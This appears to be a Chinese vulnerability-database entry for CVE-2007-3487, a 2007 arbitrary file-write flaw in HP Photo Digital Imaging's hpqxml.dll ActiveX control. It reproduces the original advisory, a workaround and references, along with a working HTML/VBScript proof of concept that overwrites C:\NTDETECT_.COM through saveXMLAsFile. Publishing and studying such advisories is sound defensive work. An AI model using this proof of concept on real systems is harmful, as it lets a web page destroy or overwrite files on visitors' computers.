Hewlett-Packard (HP) Photo Digital Imaging 绝对目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113213 漏洞类型 路径遍历
发布时间 2007-06-27 更新时间 2007-06-29
CVE编号 CVE-2007-3487 CNNVD-ID CNNVD-200706-523
漏洞平台 Windows CVSS评分 6.4
|漏洞来源
https://www.exploit-db.com/exploits/4119
https://www.securityfocus.com/bid/85647
https://cxsecurity.com/issue/WLB-2007070001
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200706-523
|漏洞详情
Hewlett-Packard(HP)PhotoDigitalImaging中存在绝对目录遍历漏洞。远程攻击者可以借助对saveXMLAsFile方式的参数,创建或重写任意文件。
|漏洞EXP
:. GOODFELLAS Security Research TEAM  .:
:. http://goodfellas.shellcode.com.ar .:
<!--
hpqxml.dll 2.0.0.133 from HP Digital Imaging Arbitary Data Write
===============================================

Internal ID: VULWAR200706275.

Introduction

hpqxml.dll is a library included in the HP Photo Digital Imaging
software package from the HP Company. http://www.hp.com.
Link: http://www.hp.com/united-states/consumer/digital_photography/home_f.html

Tested In

- Windows XP SP2 english/french with IE 6.0 / 7.0.
- Windows vista Professional English/French SP1 with IE 7.0

Summary

The saveXMLAsFile method doesn't check if it is being called from the application
or from a malicious user.

Impact

The vulnerability is due to an error in the saveXMLAsFile method that manipulate
local files insecurely, which could allow malicious users to write arbitrary
data to any file on a vulnerable system. Besides, the method does not check the
file headers before writing.

Workaround

- Activate the Kill bit zero in clsid:9C0A0321-B328-466C-8ECA-B9A5522466D3.
- Unregister hpqxml.dll using regsvr32.

Timeline

June 27, 2007 -- Bug discovery.
June 27, 2007 -- Bug published.

Credits

 * callAX <callax@shellcode.com.ar>
 * GoodFellas Security Research Team <goodfellas.shellcode.com.ar>

Technical Detail

saveXMLAsFile method receives a filename as an argument, with this format "c:\path\file".

Proof of Concept
-->

<html>
<head>
<title>Hpqxml.dll 2.0.0.133 HP Digital Imaging Arbitary Data Write</title>
</head>
<body>
<h3>Hpqxml.dll 2.0.0.133 HP Digital Imaging Arbitary Data Write</h3><br>

<object classid='clsid:9C0A0321-B328-466C-8ECA-B9A5522466D3' id='target' /></object>

<input language=VBScript onclick=HP() type=button value="Proof of Concept">

<script language = 'vbscript'>

Sub HP()

 filename = "C:\NTDETECT_.COM"

 target.saveXMLAsFile filename

End Sub

</script>
</body>
</html>

# milw0rm.com [2007-06-27]
|受影响的产品
Mercury Interactive Photo Digital Imaging Activex Control 2.0.0.133
|参考资料

来源:XF
名称:hp-photodigitalimaging-hpqxml-file-overwrite(35124)
链接:http://xforce.iss.net/xforce/xfdb/35124
来源:BUGTRAQ
名称:20070627[GOODFELLAS-VULN]hpqxml.dll2.0.0.133fromHPDigitalImagingArbitaryDataWrite.
链接:http://www.securityfocus.com/archive/1/archive/1/472384/100/0/threaded
来源:MILW0RM
名称:4119
链接:http://www.milw0rm.com/exploits/4119
来源:SREASON
名称:2846
链接:http://securityreason.com/securityalert/2846
来源:SECUNIA
名称:25869
链接:http://secunia.com/advisories/25869